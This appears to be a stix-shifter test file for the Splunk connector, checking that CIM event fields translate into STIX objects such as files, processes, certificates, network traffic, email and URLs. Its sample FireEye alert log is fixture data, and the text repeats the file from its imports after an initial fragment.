validate_instance(observed_data) assert(validated_result.is_valid == True) assert('objects' in observed_data) objects = observed_data['objects'] # Test objects in Stix observable data model after transform wrk_obj = TestTransform.get_first_of_type(objects.values(), 'windows-registry-key') assert(wrk_obj is not None) assert(wrk_obj.keys() == {'type', 'key'}) assert(wrk_obj['key'] == "hkey_local_machine\\system\\bar\\foo") user_obj = TestTransform.get_first_of_type(objects.values(), 'user-account') assert(user_obj is not None), 'user-account object type not found' assert(user_obj.keys() == {'type', 'account_login', 'user_id'}) assert(user_obj['account_login'] == "ibm_user") assert(user_obj['user_id'] == "ibm_user") file_obj = TestTransform.get_first_of_type(objects.values(), 'file') assert(file_obj is not None), 'file object type not found' assert(file_obj.keys() == {'type', 'parent_directory_ref', 'created', 'modified', 'hashes', 'name', 'size'}) assert(file_obj['created'] == "2018-08-15T15:11:55.676Z") assert(file_obj['modified'] == "2018-08-15T18:10:30.456Z") assert(file_obj['name'] == "sample.dll") assert(file_obj['size'] == 25536) assert (file_obj['hashes']['MD5'] == "41a26255d16d121dc525a6445144b895") dir_ref = file_obj['parent_directory_ref'] assert(dir_ref in objects), f"parent_directory_ref with key {file_obj["parent_directory_ref"]} not found" dir_obj = objects[dir_ref] assert(dir_obj is not None), 'directory object type not found' assert(dir_obj.keys() == {'type', 'path', 'created', 'modified'}) assert(dir_obj['path'] == "C:\\Users\\someuser\\sample.dll") assert(dir_obj['created'] == "2018-08-15T15:11:55.676Z") assert(dir_obj['modified'] == "2018-08-15T18:10:30.456Z") print(objects.keys()) print(result_bundle_objects) assert(objects.keys() == set(map(str, range(0, 5)))) def test_certificate_cim_to_stix(self): count = 1 time = "2018-08-21T15:11:55.000+00:00" serial = "1234" version = "1" sig_algorithm = "md5WithRSAEncryption" key_algorithm = "rsaEncryption" issuer = "C=US, ST=California, O=www.example.com, OU=new, CN=new" subject = "C=US, ST=Maryland, L=Baltimore, O=John Doe, OU=ExampleCorp, CN=www.example.com/emailAddress=doe@example.com" ssl_hash = "aec070645fe53ee3b3763059376134f058cc337247c978add178b6ccdfb0019f" data = { "event_count": count, "_time": time, "ssl_serial": serial, "ssl_version": version, "ssl_signature_algorithm": sig_algorithm, "ssl_issuer": issuer, "ssl_subject": subject, "ssl_hash": ssl_hash, "ssl_publickey_algorithm": key_algorithm } result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] validated_result = validate_instance(observed_data) assert(validated_result.is_valid == True) assert('objects' in observed_data) objects = observed_data['objects'] # Test objects in Stix observable data model after transform cert_obj = TestTransform.get_first_of_type(objects.values(), 'x509-certificate') assert(cert_obj is not None), 'x509-certificate object type not found' assert(cert_obj.keys() == {'type', 'serial_number', 'version', "signature_algorithm", "subject_public_key_algorithm", "issuer", "subject", "hashes"}) assert(cert_obj['serial_number'] == "1234") assert(cert_obj['version'] == "1") assert(cert_obj['signature_algorithm'] == "md5WithRSAEncryption") assert(cert_obj['issuer'] == "C=US, ST=California, O=www.example.com, OU=new, CN=new") assert(cert_obj['subject'] == "C=US, ST=Maryland, L=Baltimore, O=John Doe, OU=ExampleCorp, CN=www.example.com/emailAddress=doe@example.com") assert(cert_obj['subject_public_key_algorithm'] == "rsaEncryption") assert(cert_obj['hashes']['SHA-256'] == "aec070645fe53ee3b3763059376134f058cc337247c978add178b6ccdfb0019f") assert(objects.keys() == set(map(str, range(0, 1)))) def test_process_cim_to_stix(self): count = 1 time = "2018-08-21T15:11:55.000+00:00" user = "test_user" pid = 0 name = "test_process" filePath = "C:\\Users\\someuser\\sample.dll" create_time = "2018-08-15T15:11:55.676+00:00" modify_time = "2018-08-15T18:10:30.456+00:00" file_hash = "aec070645fe53ee3b3763059376134f058cc337247c978add178b6ccdfb0019f" file_name = "sample.dll" file_size = 25536 data = { "event_count": count, "_time": time, "user": user, "process_name": name, "process_id": pid, "file_path": filePath, "file_create_time": create_time, "file_modify_time": modify_time, "file_hash": file_hash, "file_size": file_size, "file_name": file_name } result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options, callback=hash_type_lookup) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] validated_result = validate_instance(observed_data) assert(validated_result.is_valid == True) assert('objects' in observed_data) objects = observed_data['objects'] # Test objects in Stix observable data model after transform proc_obj = TestTransform.get_first_of_type(objects.values(), 'process') assert(proc_obj is not None), 'process object type not found' assert(proc_obj.keys() == {'type', 'name', 'pid', 'binary_ref'}) assert(proc_obj['name'] == "test_process") assert(proc_obj['pid'] == 0) user_obj = TestTransform.get_first_of_type(objects.values(), 'user-account') assert(user_obj is not None), 'user-account object type not found' assert(user_obj.keys() == {'type', 'account_login', 'user_id'}) assert(user_obj['account_login'] == "test_user") assert(user_obj['user_id'] == "test_user") bin_ref = proc_obj['binary_ref'] assert(bin_ref in objects), f"binary_ref with key {proc_obj["binary_ref"]} not found" file_obj = objects[bin_ref] assert(file_obj is not None), 'file object type not found' assert(file_obj.keys() == {'type', 'parent_directory_ref', 'created', 'modified', 'size', 'name', 'hashes'}) assert(file_obj['created'] == "2018-08-15T15:11:55.676Z") assert(file_obj['modified'] == "2018-08-15T18:10:30.456Z") assert(file_obj['name'] == "sample.dll") assert(file_obj['size'] == 25536) assert (file_obj['hashes']['SHA-256'] == "aec070645fe53ee3b3763059376134f058cc337247c978add178b6ccdfb0019f") dir_ref = file_obj['parent_directory_ref'] assert(dir_ref in objects), f"parent_directory_ref with key {file_obj["parent_directory_ref"]} not found" dir_obj = objects[dir_ref] assert(dir_obj is not None), 'directory object type not found' assert(dir_obj.keys() == {'type', 'path', 'created', 'modified'}) assert(dir_obj['path'] == "C:\\Users\\someuser\\sample.dll") assert(dir_obj['created'] == "2018-08-15T15:11:55.676Z") assert(dir_obj['modified'] == "2018-08-15T18:10:30.456Z") assert(objects.keys() == set(map(str, range(0, 4)))) def test_network_cim_to_stix(self): count = 2 time = "2018-08-21T15:11:55.000+00:00" user = "ibm_user" dest_ip = "127.0.0.1" dest_port = "8090" src_ip = "2001:0db8:85a3:0000:0000:8a2e:0370:7334" src_port = "8080" transport = "http" data = {"event_count": count, "_time": time, "user": user, "dest_ip": dest_ip, "dest_port": dest_port, "src_ip": src_ip, "src_port": src_port, "protocol": transport } print(data) result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] validated_result = validate_instance(observed_data) assert(validated_result.is_valid == True) assert('objects' in observed_data) objects = observed_data['objects'] nt_obj = TestTransform.get_first_of_type(objects.values(), 'network-traffic') assert(nt_obj is not None), 'network-traffic object type not found' assert(nt_obj.keys() == {'type', 'src_port', 'dst_port', 'src_ref', 'dst_ref', 'protocols'}) assert(nt_obj['src_port'] == 8080) assert(nt_obj['dst_port'] == 8090) assert(nt_obj['protocols'] == ['http']) ip_ref = nt_obj['dst_ref'] assert(ip_ref in objects), f"dst_ref with key {nt_obj["dst_ref"]} not found" ip_obj = objects[ip_ref] assert(ip_obj.keys() == {'type', 'value'}) assert(ip_obj['type'] == 'ipv4-addr') assert(ip_obj['value'] == dest_ip) ip_ref = nt_obj['src_ref'] assert(ip_ref in objects), f"src_ref with key {nt_obj["src_ref"]} not found" ip_obj = objects[ip_ref] assert(ip_obj.keys() == {'type', 'value'}) assert(ip_obj['type'] == 'ipv6-addr') assert(ip_obj['value'] == src_ip) def test_email_cim_to_stix(self): count = 3 time = "2018-08-21T15:11:55.000+00:00" src_user = "Jane_Doe@ibm.com" subject = "Test Subject" multi = "False" data = {"event_count": count, "_time": time, "src_user": src_user, "subject": subject, "is_multipart": multi } result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] validated_result = validate_instance(observed_data) assert(validated_result.is_valid == True) assert('objects' in observed_data) objects = observed_data['objects'] msg_obj = TestTransform.get_first_of_type(objects.values(), 'email-message') assert(msg_obj is not None), 'email-message object type not found' assert(msg_obj.keys() == {'type', 'subject', 'sender_ref', 'from_ref', 'is_multipart'}) assert(msg_obj['subject'] == "Test Subject") assert(msg_obj['is_multipart'] == False) sender_ref = msg_obj['sender_ref'] assert(sender_ref in objects), f"sender_ref with key {msg_obj["sender_ref"]} not found" addr_obj = objects[sender_ref] assert(addr_obj.keys() == {'type', 'value'}) assert(addr_obj['type'] == 'email-addr') assert(addr_obj['value'] == src_user) from_ref = msg_obj['from_ref'] assert(sender_ref in objects), f"from_ref with key {msg_obj["from_ref"]} not found" addr_obj = objects[from_ref] assert(addr_obj.keys() == {'type', 'value'}) assert(addr_obj['type'] == 'email-addr') assert(addr_obj['value'] == src_user) def test_custom_mapping(self): data_source = "{\"type\": \"identity\", \"id\": \"identity--3532c56d-ea72-48be-a2ad-1a53f4c9c6d3\", \"name\": \"Splunk\", \"identity_class\": \"events\"}" data = "[{\"tag\":\"network\", \"src_ip\": \"127.0.0.1\"}]" options = { "mapping": { "cim": { "to_stix": { "tag_to_model": { "network": [ "network-traffic", "dst_ip", "src_ip" ] }, "event_count": { "key": "number_observed", "cybox": False, "transformer": "ToInteger" }, "src_ip": [ { "key": "ipv4-addr.value", "object": "src_ip" }, { "key": "ipv6-addr.value", "object": "src_ip" }, { "key": "network-traffic.src_ref", "object": "network-traffic", "references": "src_ip" } ] } } } } translation = stix_translation.StixTranslation() result_bundle = translation.translate('splunk', 'results', data_source, data, options) result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] assert('objects' in observed_data) objects = observed_data['objects'] curr_obj = TestTransform.get_first_of_type(objects.values(), 'ipv4-addr') assert(curr_obj is not None), 'ipv4-addr object type not found' assert(curr_obj.keys() == {'type', 'value'}) assert(curr_obj['value'] == "127.0.0.1") def test_cim_to_stix_no_tags(self): data = {"src_ip": "169.250.0.1", "src_port": "1220", "src_mac": "aa:bb:cc:dd:11:22", "dest_ip": "127.0.0.1", "dest_port": "1120", "dest_mac": "ee:dd:bb:aa:cc:11", "file_hash": "cf23df2207d99a74fbe169e3eba035e633b65d94", "user": "sname", "url": "https://wally.fireeye.com/malware_analysis/analyses?maid=1", "protocol": "tcp", "_bkt": "main~44~6D3E49A0-31FE-44C3-8373-C3AC6B1ABF06", "_cd": "44:12606114", "_indextime": "1546960685", "_raw": "Jan 08 2019 15:18:04 192.168.33.131 fenotify-2.alert: CEF:0|FireEye|MAS|6.2.0.74298|MO|" "malware-object|4|rt=Jan 08 2019 15:18:04 Z src=169.250.0.1 dpt=1120 dst=127.0.0.1" " spt=1220 smac=AA:BB:CC:DD:11:22 dmac=EE:DD:BB:AA:CC:11 cn2Label=sid cn2=111" " fileHash=41a26255d16d121dc525a6445144b895 proto=tcp " "request=http://qa-server.eng.fireeye.com/QE/NotificationPcaps/" "58.253.68.29_80-192.168.85.128_1165-2119283109_T.exe cs3Label=osinfo" " cs3=Microsoft Windows7 Professional 6.1 sp1 dvchost=wally dvc=10.2.101.101 cn1Label=vlan" " cn1=0 externalId=1 cs4Label=link " "cs4=https://wally.fireeye.com/malware_analysis/analyses?maid=1 cs2Label=anomaly" " cs2=misc-anomaly cs1Label=sname cs1=FE_UPX;Trojan.PWS.OnlineGames", "_serial": "0", "_si": ["splunk3-01.internal.resilientsystems.com", "main"], "_sourcetype": "fe_cef_syslog", "_time": "2019-01-08T15:18:04.000+00:00", "event_count": 1 } result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options, callback=hash_type_lookup) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] # somehow breaking the stix validation # validated_result = validate_instance(observed_data) # assert(validated_result.is_valid == True) assert('objects' in observed_data) objects = observed_data['objects'] nt_obj = TestTransform.get_first_of_type(objects.values(), 'network-traffic') assert(nt_obj is not None), 'network-traffic object type not found' assert(nt_obj.keys() == {'type', 'src_ref', 'src_port', 'dst_ref', 'dst_port', 'protocols'}) assert(nt_obj['src_port'] == 1220) assert(nt_obj['dst_port'] == 1120) assert(nt_obj['protocols'] == ['tcp']) ip_ref = nt_obj['dst_ref'] assert(ip_ref in objects), "dst_ref with key {nt_obj['dst_ref']} not found" ip_obj = objects[ip_ref] assert(ip_obj.keys() == {'type', 'value', 'resolves_to_refs'}) assert(ip_obj['type'] == 'ipv4-addr') assert(ip_obj['value'] == '127.0.0.1') assert (isinstance(ip_obj['resolves_to_refs'], list) and isinstance(ip_obj['resolves_to_refs'][0], str)) ip_ref = nt_obj['src_ref'] assert(ip_ref in objects), "src_ref with key {nt_obj['src_ref']} not found" ip_obj = objects[ip_ref] assert(ip_obj.keys() == {'type', 'value', 'resolves_to_refs'}) assert(ip_obj['type'] == 'ipv4-addr') assert(ip_obj['value'] == '169.250.0.1') assert (isinstance(ip_obj['resolves_to_refs'], list) and isinstance(ip_obj['resolves_to_refs'][0], str)) file_obj = TestTransform.get_first_of_type(objects.values(), 'file') assert (file_obj is not None), 'file object type not found' assert (file_obj.keys() == {'type', 'hashes'}) assert (file_obj['hashes']['SHA-1'] == "cf23df2207d99a74fbe169e3eba035e633b65d94") user_obj = TestTransform.get_first_of_type(objects.values(), 'user-account') assert (user_obj is not None), 'user object type not found' assert (user_obj.keys() == {'type', 'account_login', 'user_id'}) assert (user_obj['account_login'] == "sname") assert (user_obj['user_id'] == "sname") url_obj = TestTransform.get_first_of_type(objects.values(), 'url') assert (url_obj is not None), 'url object type not found' assert (url_obj.keys() == {'type', 'value'}) assert (url_obj['value'] == "https://wally.fireeye.com/malware_analysis/analyses?maid=1") domain_obj = TestTransform.get_first_of_type(objects.values(), 'domain-name') assert (domain_obj is not None), 'domain object type not found' assert (domain_obj.keys() == {'type', 'value'}) assert (domain_obj['value'] == "wally.fireeye.com") payload_obj = TestTransform.get_first_of_type(objects.values(), 'artifact') assert (payload_obj is not None), 'payload object type not found' assert (payload_obj.keys() == {'type', 'payload_bin'}) payload = 'SmFuIDA4IDIwMTkgMTU6MTg6MDQgMTkyLjE2OC4zMy4xMzEgZmVub3RpZnktMi5hbGVydDogQ0VGOjB8RmlyZUV5ZXxNQV' \ 'N8Ni4yLjAuNzQyOTh8TU98bWFsd2FyZS1vYmplY3R8NHxydD1KYW4gMDggMjAxOSAxNToxODowNCBaIHNyYz0xNjkuMjUw' \ 'LjAuMSBkcHQ9MTEyMCBkc3Q9MTI3LjAuMC4xIHNwdD0xMjIwIHNtYWM9QUE6QkI6Q0M6REQ6MTE6MjIgZG1hYz1FRTpERD' \ 'pCQjpBQTpDQzoxMSBjbjJMYWJlbD1zaWQgY24yPTExMSBmaWxlSGFzaD00MWEyNjI1NWQxNmQxMjFkYzUyNWE2NDQ1MTQ0' \ 'Yjg5NSBwcm90bz10Y3AgcmVxdWVzdD1odHRwOi8vcWEtc2VydmVyLmVuZy5maXJlZXllLmNvbS9RRS9Ob3RpZmljYXRpb2' \ '5QY2Fwcy81OC4yNTMuNjguMjlfODAtMTkyLjE2OC44NS4xMjhfMTE2NS0yMTE5MjgzMTA5X1QuZXhlIGNzM0xhYmVsPW9z' \ 'aW5mbyBjczM9TWljcm9zb2Z0IFdpbmRvd3M3IFByb2Zlc3Npb25hbCA2LjEgc3AxIGR2Y2hvc3Q9d2FsbHkgZHZjPTEwLj' \ 'IuMTAxLjEwMSBjbjFMYWJlbD12bGFuIGNuMT0wIGV4dGVybmFsSWQ9MSBjczRMYWJlbD1saW5rIGNzND1odHRwczovL3dh' \ 'bGx5LmZpcmVleWUuY29tL21hbHdhcmVfYW5hbHlzaXMvYW5hbHlzZXM/bWFpZD0xIGNzMkxhYmVsPWFub21hbHkgY3MyPW' \ '1pc2MtYW5vbWFseSBjczFMYWJlbD1zbmFtZSBjczE9RkVfVVBYO1Ryb2phbi5QV1MuT25saW5lR2FtZXM=' assert (payload_obj['payload_bin'] == payload)
import logging from stix_shifter_utils.stix_translation.src.json_to_stix import json_to_stix_translator from stix_shifter.stix_translation import stix_translation from stix_shifter_modules.splunk.entry_point import EntryPoint from stix2validator import validate_instance from stix_shifter_modules.splunk.stix_translation.splunk_utils import hash_type_lookup from stix_shifter_utils.stix_translation.src.utils.transformer_utils import get_module_transformers MODULE = "splunk" logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger() entry_point = EntryPoint() map_data = entry_point.get_results_translator().map_data data_source = { "type": "identity", "id": "identity--3532c56d-ea72-48be-a2ad-1a53f4c9c6d3", "name": "Splunk", "identity_class": "events" } options = {} class TestTransform(object): @staticmethod def get_first(itr, constraint): return next( (obj for obj in itr if constraint(obj)), None ) @staticmethod def get_first_of_type(itr, typ): return TestTransform.get_first(itr, lambda o: type(o) == dict and o.get('type') == typ) def test_common_prop(self): data = {"_time": "2018-08-21T15:11:55.000+00:00", "event_count": 5} result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] result_bundle_identity = result_bundle_objects[0] assert(result_bundle_identity['type'] == data_source['type']) assert(result_bundle_identity['id'] == data_source['id']) assert(result_bundle_identity['name'] == data_source['name']) assert(result_bundle_identity['identity_class'] == data_source['identity_class']) observed_data = result_bundle_objects[1] assert(observed_data['id'] is not None) assert(observed_data['type'] == "observed-data") assert(observed_data['created_by_ref'] == result_bundle_identity['id']) assert(observed_data['number_observed'] == 5) assert(observed_data['created'] is not None) assert(observed_data['modified'] is not None) assert(observed_data['first_observed'] is not None) assert(observed_data['last_observed'] is not None) def test_change_cim_to_stix(self): count = 1 time = "2018-08-21T15:11:55.000+00:00" file_bytes = "300" user = "ibm_user" objPath = "hkey_local_machine\\system\\bar\\foo" filePath = "C:\\Users\\someuser\\sample.dll" create_time = "2018-08-15T15:11:55.676+00:00" modify_time = "2018-08-15T18:10:30.456+00:00" file_hash = "41a26255d16d121dc525a6445144b895" file_name = "sample.dll" file_size = 25536 data = { "event_count": count, "_time": time, "user": user, "bytes": file_bytes, "object_path": objPath, "file_path": filePath, "file_create_time": create_time, "file_modify_time": modify_time, "file_hash": file_hash, "file_size": file_size, "file_name": file_name } result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options, callback=hash_type_lookup) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] validated_result = validate_instance(observed_data) assert(validated_result.is_valid == True) assert('objects' in observed_data) objects = observed_data['objects'] # Test objects in Stix observable data model after transform wrk_obj = TestTransform.get_first_of_type(objects.values(), 'windows-registry-key') assert(wrk_obj is not None) assert(wrk_obj.keys() == {'type', 'key'}) assert(wrk_obj['key'] == "hkey_local_machine\\system\\bar\\foo") user_obj = TestTransform.get_first_of_type(objects.values(), 'user-account') assert(user_obj is not None), 'user-account object type not found' assert(user_obj.keys() == {'type', 'account_login', 'user_id'}) assert(user_obj['account_login'] == "ibm_user") assert(user_obj['user_id'] == "ibm_user") file_obj = TestTransform.get_first_of_type(objects.values(), 'file') assert(file_obj is not None), 'file object type not found' assert(file_obj.keys() == {'type', 'parent_directory_ref', 'created', 'modified', 'hashes', 'name', 'size'}) assert(file_obj['created'] == "2018-08-15T15:11:55.676Z") assert(file_obj['modified'] == "2018-08-15T18:10:30.456Z") assert(file_obj['name'] == "sample.dll") assert(file_obj['size'] == 25536) assert (file_obj['hashes']['MD5'] == "41a26255d16d121dc525a6445144b895") dir_ref = file_obj['parent_directory_ref'] assert(dir_ref in objects), f"parent_directory_ref with key {file_obj['parent_directory_ref']} not found" dir_obj = objects[dir_ref] assert(dir_obj is not None), 'directory object type not found' assert(dir_obj.keys() == {'type', 'path', 'created', 'modified'}) assert(dir_obj['path'] == "C:\\Users\\someuser\\sample.dll") assert(dir_obj['created'] == "2018-08-15T15:11:55.676Z") assert(dir_obj['modified'] == "2018-08-15T18:10:30.456Z") print(objects.keys()) print(result_bundle_objects) assert(objects.keys() == set(map(str, range(0, 5)))) def test_certificate_cim_to_stix(self): count = 1 time = "2018-08-21T15:11:55.000+00:00" serial = "1234" version = "1" sig_algorithm = "md5WithRSAEncryption" key_algorithm = "rsaEncryption" issuer = "C=US, ST=California, O=www.example.com, OU=new, CN=new" subject = "C=US, ST=Maryland, L=Baltimore, O=John Doe, OU=ExampleCorp, CN=www.example.com/emailAddress=doe@example.com" ssl_hash = "aec070645fe53ee3b3763059376134f058cc337247c978add178b6ccdfb0019f" data = { "event_count": count, "_time": time, "ssl_serial": serial, "ssl_version": version, "ssl_signature_algorithm": sig_algorithm, "ssl_issuer": issuer, "ssl_subject": subject, "ssl_hash": ssl_hash, "ssl_publickey_algorithm": key_algorithm } result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] validated_result = validate_instance(observed_data) assert(validated_result.is_valid == True) assert('objects' in observed_data) objects = observed_data['objects'] # Test objects in Stix observable data model after transform cert_obj = TestTransform.get_first_of_type(objects.values(), 'x509-certificate') assert(cert_obj is not None), 'x509-certificate object type not found' assert(cert_obj.keys() == {'type', 'serial_number', 'version', "signature_algorithm", "subject_public_key_algorithm", "issuer", "subject", "hashes"}) assert(cert_obj['serial_number'] == "1234") assert(cert_obj['version'] == "1") assert(cert_obj['signature_algorithm'] == "md5WithRSAEncryption") assert(cert_obj['issuer'] == "C=US, ST=California, O=www.example.com, OU=new, CN=new") assert(cert_obj['subject'] == "C=US, ST=Maryland, L=Baltimore, O=John Doe, OU=ExampleCorp, CN=www.example.com/emailAddress=doe@example.com") assert(cert_obj['subject_public_key_algorithm'] == "rsaEncryption") assert(cert_obj['hashes']['SHA-256'] == "aec070645fe53ee3b3763059376134f058cc337247c978add178b6ccdfb0019f") assert(objects.keys() == set(map(str, range(0, 1)))) def test_process_cim_to_stix(self): count = 1 time = "2018-08-21T15:11:55.000+00:00" user = "test_user" pid = 0 name = "test_process" filePath = "C:\\Users\\someuser\\sample.dll" create_time = "2018-08-15T15:11:55.676+00:00" modify_time = "2018-08-15T18:10:30.456+00:00" file_hash = "aec070645fe53ee3b3763059376134f058cc337247c978add178b6ccdfb0019f" file_name = "sample.dll" file_size = 25536 data = { "event_count": count, "_time": time, "user": user, "process_name": name, "process_id": pid, "file_path": filePath, "file_create_time": create_time, "file_modify_time": modify_time, "file_hash": file_hash, "file_size": file_size, "file_name": file_name } result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options, callback=hash_type_lookup) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] validated_result = validate_instance(observed_data) assert(validated_result.is_valid == True) assert('objects' in observed_data) objects = observed_data['objects'] # Test objects in Stix observable data model after transform proc_obj = TestTransform.get_first_of_type(objects.values(), 'process') assert(proc_obj is not None), 'process object type not found' assert(proc_obj.keys() == {'type', 'name', 'pid', 'binary_ref'}) assert(proc_obj['name'] == "test_process") assert(proc_obj['pid'] == 0) user_obj = TestTransform.get_first_of_type(objects.values(), 'user-account') assert(user_obj is not None), 'user-account object type not found' assert(user_obj.keys() == {'type', 'account_login', 'user_id'}) assert(user_obj['account_login'] == "test_user") assert(user_obj['user_id'] == "test_user") bin_ref = proc_obj['binary_ref'] assert(bin_ref in objects), f"binary_ref with key {proc_obj['binary_ref']} not found" file_obj = objects[bin_ref] assert(file_obj is not None), 'file object type not found' assert(file_obj.keys() == {'type', 'parent_directory_ref', 'created', 'modified', 'size', 'name', 'hashes'}) assert(file_obj['created'] == "2018-08-15T15:11:55.676Z") assert(file_obj['modified'] == "2018-08-15T18:10:30.456Z") assert(file_obj['name'] == "sample.dll") assert(file_obj['size'] == 25536) assert (file_obj['hashes']['SHA-256'] == "aec070645fe53ee3b3763059376134f058cc337247c978add178b6ccdfb0019f") dir_ref = file_obj['parent_directory_ref'] assert(dir_ref in objects), f"parent_directory_ref with key {file_obj['parent_directory_ref']} not found" dir_obj = objects[dir_ref] assert(dir_obj is not None), 'directory object type not found' assert(dir_obj.keys() == {'type', 'path', 'created', 'modified'}) assert(dir_obj['path'] == "C:\\Users\\someuser\\sample.dll") assert(dir_obj['created'] == "2018-08-15T15:11:55.676Z") assert(dir_obj['modified'] == "2018-08-15T18:10:30.456Z") assert(objects.keys() == set(map(str, range(0, 4)))) def test_network_cim_to_stix(self): count = 2 time = "2018-08-21T15:11:55.000+00:00" user = "ibm_user" dest_ip = "127.0.0.1" dest_port = "8090" src_ip = "2001:0db8:85a3:0000:0000:8a2e:0370:7334" src_port = "8080" transport = "http" data = {"event_count": count, "_time": time, "user": user, "dest_ip": dest_ip, "dest_port": dest_port, "src_ip": src_ip, "src_port": src_port, "protocol": transport } print(data) result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] validated_result = validate_instance(observed_data) assert(validated_result.is_valid == True) assert('objects' in observed_data) objects = observed_data['objects'] nt_obj = TestTransform.get_first_of_type(objects.values(), 'network-traffic') assert(nt_obj is not None), 'network-traffic object type not found' assert(nt_obj.keys() == {'type', 'src_port', 'dst_port', 'src_ref', 'dst_ref', 'protocols'}) assert(nt_obj['src_port'] == 8080) assert(nt_obj['dst_port'] == 8090) assert(nt_obj['protocols'] == ['http']) ip_ref = nt_obj['dst_ref'] assert(ip_ref in objects), f"dst_ref with key {nt_obj['dst_ref']} not found" ip_obj = objects[ip_ref] assert(ip_obj.keys() == {'type', 'value'}) assert(ip_obj['type'] == 'ipv4-addr') assert(ip_obj['value'] == dest_ip) ip_ref = nt_obj['src_ref'] assert(ip_ref in objects), f"src_ref with key {nt_obj['src_ref']} not found" ip_obj = objects[ip_ref] assert(ip_obj.keys() == {'type', 'value'}) assert(ip_obj['type'] == 'ipv6-addr') assert(ip_obj['value'] == src_ip) def test_email_cim_to_stix(self): count = 3 time = "2018-08-21T15:11:55.000+00:00" src_user = "Jane_Doe@ibm.com" subject = "Test Subject" multi = "False" data = {"event_count": count, "_time": time, "src_user": src_user, "subject": subject, "is_multipart": multi } result_bundle = json_to_stix_translator.convert_to_stix( data_source, map_data, [data], get_module_transformers(MODULE), options) assert(result_bundle['type'] == 'bundle') result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] validated_result = validate_instance(observed_data) assert(validated_result.is_valid == True) assert('objects' in observed_data) objects = observed_data['objects'] msg_obj = TestTransform.get_first_of_type(objects.values(), 'email-message') assert(msg_obj is not None), 'email-message object type not found' assert(msg_obj.keys() == {'type', 'subject', 'sender_ref', 'from_ref', 'is_multipart'}) assert(msg_obj['subject'] == "Test Subject") assert(msg_obj['is_multipart'] == False) sender_ref = msg_obj['sender_ref'] assert(sender_ref in objects), f"sender_ref with key {msg_obj['sender_ref']} not found" addr_obj = objects[sender_ref] assert(addr_obj.keys() == {'type', 'value'}) assert(addr_obj['type'] == 'email-addr') assert(addr_obj['value'] == src_user) from_ref = msg_obj['from_ref'] assert(sender_ref in objects), f"from_ref with key {msg_obj['from_ref']} not found" addr_obj = objects[from_ref] assert(addr_obj.keys() == {'type', 'value'}) assert(addr_obj['type'] == 'email-addr') assert(addr_obj['value'] == src_user) def test_custom_mapping(self): data_source = "{\"type\": \"identity\", \"id\": \"identity--3532c56d-ea72-48be-a2ad-1a53f4c9c6d3\", \"name\": \"Splunk\", \"identity_class\": \"events\"}" data = "[{\"tag\":\"network\", \"src_ip\": \"127.0.0.1\"}]" options = { "mapping": { "cim": { "to_stix": { "tag_to_model": { "network": [ "network-traffic", "dst_ip", "src_ip" ] }, "event_count": { "key": "number_observed", "cybox": False, "transformer": "ToInteger" }, "src_ip": [ { "key": "ipv4-addr.value", "object": "src_ip" }, { "key": "ipv6-addr.value", "object": "src_ip" }, { "key": "network-traffic.src_ref", "object": "network-traffic", "references": "src_ip" } ] } } } } translation = stix_translation.StixTranslation() result_bundle = translation.translate('splunk', 'results', data_source, data, options) result_bundle_objects = result_bundle['objects'] observed_data = result_bundle_objects[1] assert('objects' in observed_data) objects = observed_data['objects'] curr_obj = TestTransform.get_first_of_type(objects.values(), 'ipv4-addr') assert(curr_obj is not None), 'ipv4-addr object type not found' assert(curr_obj.keys() == {'type', 'value'}) assert(curr_obj['value'] == "127.0.0.1") def test_cim_to_stix_no_tags(self): data = {"src_ip": "169.250.0.1", "src_port": "1220", "src_mac": "aa:bb:cc:dd:11:22", "dest_ip": "127.0.0.1", "dest_port": "1120", "dest_mac": "ee:dd:bb:aa:cc:11", "file_hash": "cf23df2207d99a74fbe169e3eba035e633b65d94", "user": "sname", "url": "https://wally.fireeye.com/malware_analysis/analyses?maid=1", "protocol": "tcp", "_bkt": "main~44~6D3E49A0-31FE-44C3-8373-C3AC6B1ABF06", "_cd": "44:12606114", "_indextime": "1546960685", "_raw": "Jan 08 2019 15:18:04 192.168.33.131 fenotify-2.alert: CEF:0|FireEye|MAS|6.2.0.74298|MO|" "malware-object|4|rt=Jan 08 2019 15:18:04 Z src=169.250.0.1 dpt=1120 dst=127.0.0.1" " spt=1220 smac=AA:BB:CC:DD:11:22 dmac=EE:DD:BB:AA:CC:11 cn2Label=sid cn2=111" " fileHash=41a26255d16d121dc525a6445144b895 proto=tcp " "request=http://qa-server.eng.fireeye.com/QE/NotificationPcaps/" "58.253.68.29_80-192.168.85.128_1165-2119283109_T.exe 